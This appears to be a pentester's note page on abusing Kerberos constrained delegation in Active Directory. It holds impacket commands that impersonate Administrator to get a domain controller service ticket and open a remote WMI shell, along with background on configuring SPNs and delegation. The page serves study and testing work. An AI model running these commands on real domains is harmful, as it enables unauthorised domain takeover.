Constrained Delegation

AllowedTodelegate

impacket-getST '$domain.local/$user:$pass' -spn 'cifs/$dc.$domain.local' -impersonate 'Administrator'
 
export KRB5CCNAME=Administrator@cifs_$dc.$domain.local@$domain.LOCAL.ccache 
 
impacket-wmiexec '@$dc.$domain.local' -k -no-pass -debug

Background

Prerequisites

ActiveDirectory
Two or more Servers: Service-Provider / Backend-Server
Kerberos authentification

Create SPN for the service account

setspn -S HTTP/webserver.domain.local domain.local\WebServiceAccount
setspn -S MSSQLSvc/sqlserver.domain.local:1433 domain.local\SQLServiceAccount

AD Settings

Active Directory Users and Computers
Search: WebServiceAccount
Properties → Delegation
Check Trust this computer for delegation to specified services only
- Use Kerberos only - more secure
- Use any authentication protocol - NTLM!
Add - choose Backend server SQL-Server$
Choose allowed services MSSQLSVC/sqlserver.domain.local
Save and replicate

References

Hacktricks: Constrained Delegation

hckhsn

Explorer

Constrained Delegation

Constrained Delegation

AllowedTodelegate

Background

Prerequisites

Create SPN for the service account

AD Settings

References

Graphansicht

Inhaltsverzeichnis